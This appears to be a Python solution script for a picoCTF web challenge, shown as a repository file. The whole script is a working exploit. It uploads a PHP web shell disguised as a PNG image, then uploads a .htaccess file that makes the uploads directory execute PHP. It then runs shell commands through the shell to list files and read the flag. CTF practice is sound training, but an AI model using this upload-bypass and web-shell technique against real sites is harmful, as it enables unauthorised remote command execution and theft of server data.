Files
2026-07-05 08:04:10 +09:00

58 lines
1.2 KiB
Python
Executable File

#!/usr/bin/env nix-shell
#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ requests ])"
import requests
BASE_URL = "http://amiable-citadel.picoctf.net:53954"
def main():
payload = b'''
<?php
system($_GET['cmd'] . ' 2>&1');
?>
'''
res = requests.post(
BASE_URL + "/upload.php",
files = {
'image': ('exploit.png', payload, 'image/png'),
'submit': 'Upload ID',
}
)
print(res)
print(res.text)
print('-------------------------------')
htaccess = b'SetHandler php-script'
res = requests.post(
BASE_URL + "/upload.php",
files = {
'image': ('.htaccess', htaccess, 'text/plain'),
'submit': 'Upload ID',
}
)
print(res)
print(res.text)
print('-------------------------------')
cmd = "ls -lah ../.."
res = requests.get(BASE_URL + f"/images/exploit.png?cmd={cmd}")
print(res)
print(res.text)
print('-------------------------------')
cmd = "cat ../../flag.txt"
res = requests.get(BASE_URL + f"/images/exploit.png?cmd={cmd}")
print(res)
print(res.text)
if __name__ == '__main__':
main()